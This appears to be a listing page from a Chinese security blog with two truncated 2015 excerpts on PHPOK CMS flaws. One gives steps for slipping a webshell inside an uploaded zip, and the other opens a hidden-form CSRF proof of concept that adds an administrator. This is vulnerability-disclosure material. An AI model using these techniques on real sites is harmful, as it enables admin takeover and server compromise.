phpok csrf成功getshell(二)

admin 发布于 2015-02-08 01:14
版本:4.2.100 前台能上传zip文件,而且对升级文件没进行校验。 上传zip演示: 先把我们的木马文件test.php添加到压缩包内test.zip 注册一个帐号-修改资料. 选择一个正常图片,截获数据 然后修改数据。 成功...

phpok csrf添加管理员+后台getshell

admin 发布于 2015-02-08 01:13
老问题,一直没修复。 poc: code 区域 <div style="display:none"> <form action="http://localhost/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post"> &...